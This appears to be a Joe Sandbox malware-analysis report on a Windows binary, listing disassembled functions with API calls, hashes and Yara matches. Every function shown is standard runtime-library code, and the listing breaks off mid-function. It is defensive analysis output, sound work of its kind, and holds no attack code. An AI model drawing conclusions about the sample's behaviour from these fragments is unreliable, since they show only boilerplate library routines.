                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 3864826663-0
                                                            • Opcode ID: b11f90d838427d37edd64e38e717b3af24babdf9d4b4099e4006f2966c914547
                                                            • Instruction ID: a5f38111fa01d07f603b669534a8c8f44d85fc048aacd33138e2e818ffff9497
                                                            • Opcode Fuzzy Hash: b11f90d838427d37edd64e38e717b3af24babdf9d4b4099e4006f2966c914547
                                                            • Instruction Fuzzy Hash: B8513672600606AFDB258F75CD81EBF37A9EB48754F24426AFD04E6250DBBCDC40C658
                                                            Function 00439ECE Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                            • Instruction ID: 1cba7b180e09f8073ff63dd7a5e39a9331c2ed4ff1a144fb7a18fbb91be6d7aa
                                                            • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                            • Instruction Fuzzy Hash: 0761F071900205AFDB24DF69C842B9ABBF4EF09710F10516BE884EB382E7799E418B59
                                                            Function 00A8A135 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: 9dd0af2cd9ac545e18683059acdc486e5edaf4f6a50a58f2a1e3dc1611189c70
                                                            • Instruction ID: 91ff5bb15759c577e2d1c94ea1eb8779adae3a33002251edee5dad872bd27265
                                                            • Opcode Fuzzy Hash: 9dd0af2cd9ac545e18683059acdc486e5edaf4f6a50a58f2a1e3dc1611189c70
                                                            • Instruction Fuzzy Hash: 0461E136D00205AFEB20EF68C842B9EBBF4EF15710F1445AAF844EB391EB719D418B51
                                                            Function 004338A3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(?,0042C25D,E0830C40,?,?,?,?,?,?,00434018,0040DDFA,0042C25D,?,0042C25D,0042C25D,0040DDFA), ref: 004338E5
                                                            • __fassign.LIBCMT ref: 00433960
                                                            • __fassign.LIBCMT ref: 0043397B
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,0042C25D,00000001,?,00000005,00000000,00000000), ref: 004339A1
                                                            • WriteFile.KERNEL32(?,?,00000000,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339C0
                                                            • WriteFile.KERNEL32(?,0040DDFA,00000001,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: 104bec089efa8ddbbf106d3ba7b26555e8bb7f605cb6606e0c3875e27b37aebe
                                                            • Instruction ID: 3302cc5d055cfa7cb2d102f804d659735755d65fc8cb0b0a8ea62d8a9f37e22e
                                                            • Opcode Fuzzy Hash: 104bec089efa8ddbbf106d3ba7b26555e8bb7f605cb6606e0c3875e27b37aebe
                                                            • Instruction Fuzzy Hash: 1E51B3B09002499FCB10DFA8D845BEEBBF4EF09701F14412BE556E7391E7349A51CB69
                                                            Function 00A83B0A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00A8427F,?,?,?,?,?,?), ref: 00A83B4C
                                                            • __fassign.LIBCMT ref: 00A83BC7
                                                            • __fassign.LIBCMT ref: 00A83BE2
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00A83C08
                                                            • WriteFile.KERNEL32(?,?,00000000,00A8427F,00000000,?,?,?,?,?,?,?,?,?,00A8427F,?), ref: 00A83C27
                                                            • WriteFile.KERNEL32(?,?,00000001,00A8427F,00000000,?,?,?,?,?,?,?,?,?,00A8427F,?), ref: 00A83C60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: 3d1a47c850e04374499698871a03745696c64c98de2feb07923d8311921bf8e0
                                                            • Instruction ID: 16a7a51c9cd2dbe7d4a327b79965861b3d37a30f7606e2bed05eed20f0b81cc4
                                                            • Opcode Fuzzy Hash: 3d1a47c850e04374499698871a03745696c64c98de2feb07923d8311921bf8e0
                                                            • Instruction Fuzzy Hash: 1C51A3B5D00209AFCF10DFA9D885AEEBBF4EF09700F14416AE955F7291E7309A45CB64
                                                            Function 00A6B14D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _SpinWait.LIBCONCRT ref: 00A6B172
                                                              • Part of subcall function 00A611A8: _SpinWait.LIBCONCRT ref: 00A611C0
                                                            • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00A6B186
                                                            • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00A6B1B8
                                                            • List.LIBCMT ref: 00A6B23B
                                                            • List.LIBCMT ref: 00A6B24A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                            • String ID: 6+A
                                                            • API String ID: 3281396844-2819411039
                                                            • Opcode ID: 6ffcc6e76adf532cd1f074ee0a3a399835260594ca9526c60de83cd6ea276e11
                                                            • Instruction ID: 204f83112d4ca1a5789622398a303dd81cce7b4ed5bfa86aacab708674053e82
                                                            • Opcode Fuzzy Hash: 6ffcc6e76adf532cd1f074ee0a3a399835260594ca9526c60de83cd6ea276e11
                                                            • Instruction Fuzzy Hash: 69319A32D14656EFCB14EFA4CAA16EDBBB1BF06304F04026AD841B7652DB316D94CBA0
                                                            Function 0043F961 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                            • Instruction ID: 44ae7d58254669835104620532439e4651bcdc670411f054606b0734315a2d03
                                                            • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                            • Instruction Fuzzy Hash: B3112772A00215BFCB212FB3AC05E6B7A5CEF8A725F10063BF815D7240DA38890486A9
                                                            Function 00A8FBC8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3d1ac6632e527dd31d058b85c9e7d58ea3761bf3ce0a696b0fb445ac4584affe
                                                            • Instruction ID: a914498ca9f0506bc9a3a7762cc8fa1157d142359bbb191e96a5bd7f70c7d433
                                                            • Opcode Fuzzy Hash: 3d1ac6632e527dd31d058b85c9e7d58ea3761bf3ce0a696b0fb445ac4584affe
                                                            • Instruction Fuzzy Hash: 7611D67250411ABFDB207F768D45D6B7AACEF96B60B108674FC19C7151DA308A00C7A0
                                                            Function 0043A3A3 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0043A0EA: _free.LIBCMT ref: 0043A113
                                                            • _free.LIBCMT ref: 0043A3F1
                                                              • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                              • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                            • _free.LIBCMT ref: 0043A3FC
                                                            • _free.LIBCMT ref: 0043A407
                                                            • _free.LIBCMT ref: 0043A45B
                                                            • _free.LIBCMT ref: 0043A466
                                                            • _free.LIBCMT ref: 0043A471
                                                            • _free.LIBCMT ref: 0043A47C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                            • Instruction ID: c6d5b65f25628cde0ea29edd4ff893f52e85bca0f905c5b3a1529a10dd86fb4b
                                                            • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                            • Instruction Fuzzy Hash: 3311A232580B04A6D521BF72CC07FCB77AC6F2C306F40981EB6DA7A052CA6EB5105B46
                                                            Function 00A8A60A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00A8A351: _free.LIBCMT ref: 00A8A37A
                                                            • _free.LIBCMT ref: 00A8A658
                                                              • Part of subcall function 00A836F1: HeapFree.KERNEL32(00000000,00000000,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?), ref: 00A83707
                                                              • Part of subcall function 00A836F1: GetLastError.KERNEL32(?,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?,?), ref: 00A83719
                                                            • _free.LIBCMT ref: 00A8A663
                                                            • _free.LIBCMT ref: 00A8A66E
                                                            • _free.LIBCMT ref: 00A8A6C2
                                                            • _free.LIBCMT ref: 00A8A6CD
                                                            • _free.LIBCMT ref: 00A8A6D8
                                                            • _free.LIBCMT ref: 00A8A6E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                            • Instruction ID: 5656d6dc30623c013466789cf6878c864949ae3b9e3cb7f9e676ce9c2bf4c544
                                                            • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                            • Instruction Fuzzy Hash: 10119332540F04BAEE21B7B5CE4BFCB779CDF00740F440C26B299AA152EA74F5144751
                                                            Function 00412412 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 00412420
                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 00412426
                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 00412453
                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 0041245D
                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 0041246F
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412485
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00412493
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                            • String ID:
                                                            • API String ID: 4227777306-0
                                                            • Opcode ID: 98e3d6891a0dd5d677cbf2f779bc3de9b57089e9d4dcd81604344dd870270d4b
                                                            • Instruction ID: 772dfc6c110a2a8534dac99729108f53ec46fdbd0e11e7149f9ef709963b67bd
                                                            • Opcode Fuzzy Hash: 98e3d6891a0dd5d677cbf2f779bc3de9b57089e9d4dcd81604344dd870270d4b
                                                            • Instruction Fuzzy Hash: 56012B34A00125B7C720AF66ED09BEF376CEF42B52B60443BF805D2151DBACDA54866D
                                                            Function 00A62679 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00A60DC0,?,?,?,00000000), ref: 00A62687
                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00A60DC0,?,?,?,00000000), ref: 00A6268D
                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00A60DC0,?,?,?,00000000), ref: 00A626BA
                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00A60DC0,?,?,?,00000000), ref: 00A626C4
                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00A60DC0,?,?,?,00000000), ref: 00A626D6
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A626EC
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A626FA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                            • String ID:
                                                            • API String ID: 4227777306-0
                                                            • Opcode ID: 23aee74c988fd39cb7eacc8cccc5b930dc7cceb5caf4327195496d093c37fa26
                                                            • Instruction ID: 550aeaa16134876fb41727f31d95069158e2eadba5ec9a92ca3df9547fe57a4d
                                                            • Opcode Fuzzy Hash: 23aee74c988fd39cb7eacc8cccc5b930dc7cceb5caf4327195496d093c37fa26
                                                            • Instruction Fuzzy Hash: A601F23C600115A7D720AF61EC49BAF3778EF42B92B604826F405E2061EB24D90497A8
                                                            Function 00A624C4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,00A6672B), ref: 00A624D6
                                                            • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 00A624E4
                                                            • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 00A624F2
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,00A6672B), ref: 00A62520
                                                            • GetProcAddress.KERNEL32(00000000), ref: 00A62527
                                                            • GetLastError.KERNEL32(?,?,?,00A6672B), ref: 00A62542
                                                            • GetLastError.KERNEL32(?,?,?,00A6672B), ref: 00A6254E
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A62564
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A62572
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                            • String ID: kernel32.dll
                                                            • API String ID: 4179531150-1793498882
                                                            • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                            • Instruction ID: 3bd2eeac3fb6bf8ebf040c50268ef57392abdf6ab86c76f59169f958acb15181
                                                            • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                            • Instruction Fuzzy Hash: B0F0A9759007103FE7117BB97D49A2A7FBCDD46B633100636F412D21A2EB79C940876C
                                                            Function 0042FF04 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002), ref: 0042FF24
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF37
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000), ref: 0042FF5A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: 11@$CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-3445089953
                                                            • Opcode ID: 565e8aad81c42c30b4556ccca566ef737f7629af4b303484cc6756d66643e6b5
                                                            • Instruction ID: b9f6d20b166e67f6b42c672312b3e089bcad04f0cb699fcb0f77a3f19f5d5cf1
                                                            • Opcode Fuzzy Hash: 565e8aad81c42c30b4556ccca566ef737f7629af4b303484cc6756d66643e6b5
                                                            • Instruction Fuzzy Hash: 09F0C834B00218BFDB109F50DD09B9EBFB4EF05B12F510076F805A2290CB799E44DA4C
                                                            Function 00A823BB Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00A8260C,00000001,00000001,?), ref: 00A82415
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A8260C,00000001,00000001,?,?,?,?), ref: 00A8249B
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A82595
                                                            • __freea.LIBCMT ref: 00A825A2
                                                              • Part of subcall function 00A8392E: RtlAllocateHeap.NTDLL(00000000,00A5DAFC,00000000), ref: 00A83960
                                                            • __freea.LIBCMT ref: 00A825AB
                                                            • __freea.LIBCMT ref: 00A825D0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: aa9bc8e9f6ae49b47729d4d1ac391125a0a3f31e377bd1f53ff12dab55d8c0ce
                                                            • Instruction ID: 2496c841b128900a884fa230377b90c7ac108a67274bdf4c09a14e57562529e2
                                                            • Opcode Fuzzy Hash: aa9bc8e9f6ae49b47729d4d1ac391125a0a3f31e377bd1f53ff12dab55d8c0ce
                                                            • Instruction Fuzzy Hash: 3751C072650216AFEB29AF64DC92FBF77AAEB84750F154629FC05DA140EB38DC40C760
                                                            Function 00A7E439 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __cftoe
                                                            • String ID:
                                                            • API String ID: 4189289331-0
                                                            • Opcode ID: 6290ddc8ebea7097b1647a61380f344cd02ada4a64146fe838c0f2f7cf2ccb9a
                                                            • Instruction ID: e39857da04081bf7a0257af19bcd08b66ac9d4dd5b076186a13f3d092f044dd7
                                                            • Opcode Fuzzy Hash: 6290ddc8ebea7097b1647a61380f344cd02ada4a64146fe838c0f2f7cf2ccb9a
                                                            • Instruction Fuzzy Hash: 1451F972900205ABDF24EB68CD45EAE77A9AF4D364F14C2A9F81DD6192EB31DD008664
                                                            Function 00A78F44 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00A78F97
                                                            • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00A78FB0
                                                            • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00A78FB7
                                                            • PMDtoOffset.LIBCMT ref: 00A78FD6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FindInstanceTargetType$Offset
                                                            • String ID:
                                                            • API String ID: 1467055271-0
                                                            • Opcode ID: e6f20a520bc3681ee8ec9394f734c8bc4ff22510230f0e69c1b4f533b38a8f60
                                                            • Instruction ID: 5b7130a64e5008a071302db0538c3b78011bd51aaff0c778bc32cf3487b5077c
                                                            • Opcode Fuzzy Hash: e6f20a520bc3681ee8ec9394f734c8bc4ff22510230f0e69c1b4f533b38a8f60
                                                            • Instruction Fuzzy Hash: 982138726442049FCF14DF68DE4AEAE77B5EF44720B20C52AF90CD3181EF39E90186A1
                                                            Function 00A5545C Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                            • String ID:
                                                            • API String ID: 1687354797-0
                                                            • Opcode ID: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                            • Instruction ID: a2cead66bbf398e88b67fc96b879f08e1f6005a23551e454b30dc5124ca034ed
                                                            • Opcode Fuzzy Hash: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                            • Instruction Fuzzy Hash: D4217471C04208AADF15ABB4D955BDEB7F8BF08326F144059E800B7291EB749A48C765
                                                            Function 00428DFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,B3455536), ref: 00428E08
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428E16
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E2F
                                                            • SetLastError.KERNEL32(00000000,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,B3455536), ref: 00428E81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                            • Instruction ID: 13d4ce3fadb6930e01a7802674f608048713f2fc9b33e2444f23e675ffd4a1be
                                                            • Opcode Fuzzy Hash: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                            • Instruction Fuzzy Hash: 7301D43230AB316EA6242BF67C8956F2744EB1577ABA1033FF510D12F1EE698C21954E
                                                            Function 00A79061 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00A79058,00A769E9,00A90927,00000008,00A90C8C,?,?,?,?,00A73CD2,?,?,0045A064), ref: 00A7906F
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A7907D
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A79096
                                                            • SetLastError.KERNEL32(00000000,?,00A79058,00A769E9,00A90927,00000008,00A90C8C,?,?,?,?,00A73CD2,?,?,0045A064), ref: 00A790E8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                            • Instruction ID: 719ca3ab37612bc138ec477384389077705f80a2cab4197613b856558a76aca4
                                                            • Opcode Fuzzy Hash: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                            • Instruction Fuzzy Hash: B401F73212AB117EA72427B47C899AB2754EB55776B30C33BF52C412F3EF128C126599
                                                            Function 00404D77 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00404D88
                                                            • int.LIBCPMT ref: 00404D9F
                                                              • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                              • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                            • std::locale::_Getfacet.LIBCPMT ref: 00404DA8
                                                            • std::_Facet_Register.LIBCPMT ref: 00404DD9
